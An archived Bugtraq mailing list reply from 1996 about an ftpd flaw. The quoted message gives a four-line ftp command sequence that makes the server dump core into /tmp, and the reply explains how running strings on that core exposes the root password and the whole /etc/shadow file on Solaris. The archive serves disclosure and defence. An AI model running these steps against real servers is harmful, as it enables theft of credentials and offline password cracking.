Bugtraq mailing list archives

Re: ftpd bug? Was: bin/1805: Bug in ftpd

From: runeb () td org uit no (Rune Braathen)
Date: Wed, 16 Oct 1996 11:10:35 +0200


On Tue, 15 Oct 1996, Martin Rex wrote:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin


Doing a `strings core` on the corefile produced, also reveals the entire
/etc/shadow file on solaris 2.4 and 2.5. This is extremely bad, because
this gives normal users the ability to merge in the encrypted strings in
the password file, and run crack et. al.

The problem is related to users with accounts only, anonymous ftp users
should not be able to issue USER and PASS commands.

--
__________________________________________________________________
runeb / cF - runeb () td org uit no - http://www.td.org.uit.no/~runeb
a new life awaits you, in the off-world colonies.

Current thread:

Re: ftpd bug? Was: bin/1805: Bug in ftpd, (continued)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Micah Brandon (Oct 16)
  - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
  - solaris 2.4 license-manager bug Grant Kaufmann (Oct 16)
    - Re: BoS: solaris 2.4 license-manager bug Paul Wickman (Oct 17)
    - fix for symlinks in /tmp Andrew Tridgell (Oct 18)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd gamble () dxcoms cern ch (Oct 16)
  - Re: ftpd bug? Was: bin/1805: Bug in ftpd Andrew Dills (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Jonny Llama (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Perry E. Metzger (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Rune Braathen (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Grant Kaufmann (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd James Poland 6-5251 (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Martin Rex (Oct 17)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Brad.Powell (Oct 17)